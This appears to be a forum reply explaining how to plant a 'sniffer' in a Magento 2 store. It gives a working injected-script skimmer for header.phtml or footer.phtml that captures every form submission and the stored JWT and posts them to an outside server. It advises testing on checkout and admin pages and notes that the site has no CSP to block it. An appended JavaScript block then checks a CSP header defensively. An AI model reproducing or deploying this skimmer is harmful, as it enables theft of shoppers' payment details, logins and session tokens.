
Is it possible to inject a sniffer through a JWT token?

First, you’ll need access to the Magento 2 files, ideally through the theme or a custom module. Then inject your sniffer code into a template file like header.phtml or footer.phtml.
For example:
HTML:
<script>
  // Capture form submissions
  document.addEventListener('submit', function (e) {
    const formData = new FormData(e.target);
    const data = {};
    formData.forEach((value, key) => data[key] = value);


    // Send data to your server with the JWT token
    fetch('https://your-server.com/capture', {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
        'Authorization': `Bearer ${localStorage.getItem('jwt_token')}`
      },
      body: JSON.stringify(data)
    });
  });
</script>

The above sample script captures form data and sends it to your server, including the JWT token for authentication. I recommend that you check if the sniffer works on important pages like product pages, checkout, or the admin panel. And as you mentioned there’s no CSP, you don’t need to worry about script restrictions. Plus, ensure that your server is set up to securely receive the data.
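From the defender's side, the reply's remark about the missing CSP can be checked directly. The following is an added example, not part of the original post: it evaluates a Content-Security-Policy header against the two things the posted snippet relies on, inline script execution and a `fetch` to a third-party origin. The function names, the shop origin `https://shop.example` and the simplified source matching are assumptions.

```javascript
// Added defensive example: simplified CSP evaluation (ignores ports, paths,
// script-src-elem). Function names and sample origins are assumptions.
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    // Per CSP, a repeated directive is ignored: the first occurrence wins.
    if (name && !policy.has(name.toLowerCase())) {
      policy.set(name.toLowerCase(), sources.map((s) => s.toLowerCase()));
    }
  }
  return policy;
}

// null means "no directive applies", i.e. the browser imposes no restriction.
const effective = (policy, name) => policy.get(name) ?? policy.get('default-src') ?? null;

function inlineScriptAllowed(policy) {
  const sources = effective(policy, 'script-src');
  if (sources === null) return true;
  // A nonce, hash or 'strict-dynamic' makes browsers ignore 'unsafe-inline'.
  const strict = sources.some((s) => /^'(nonce-|sha(256|384|512)-|strict-dynamic')/.test(s));
  return sources.includes("'unsafe-inline'") && !strict;
}

function connectAllowed(policy, targetUrl, pageOrigin) {
  const sources = effective(policy, 'connect-src');
  if (sources === null) return true;
  const target = new URL(targetUrl);
  return sources.some((src) => {
    if (src === "'self'") return target.origin === pageOrigin;
    if (src === '*') return /^(https?|wss?):$/.test(target.protocol);
    if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return src === target.protocol;
    if (src.startsWith("'")) return false; // 'none' and other keywords
    const m = src.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)/);
    if (!m || (m[1] && m[1] + ':' !== target.protocol)) return false;
    // "*.example.com" matches subdomains only, never the bare domain.
    return m[2].startsWith('*.') ? target.hostname.endsWith(m[2].slice(1)) : m[2] === target.hostname;
  });
}

// Which of the two steps the posted snippet needs would the browser permit?
function assess(header, exfilUrl, pageOrigin) {
  const policy = parseCsp(header || '');
  return { inlineScriptRuns: inlineScriptAllowed(policy),
           exfilRequestSent: connectAllowed(policy, exfilUrl, pageOrigin) };
}
console.log(assess("default-src 'self'", 'https://your-server.com/capture', 'https://shop.example'));
```

A policy that still carries `'unsafe-inline'` lets the listener run, but a `connect-src` limited to known origins keeps the request from leaving the browser; with no policy at all, both steps succeed.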
 

